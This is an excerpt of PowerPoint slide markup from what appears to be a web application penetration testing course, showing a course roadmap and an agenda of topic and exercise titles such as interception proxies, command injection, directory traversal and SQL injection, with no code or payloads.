          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information Leakage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
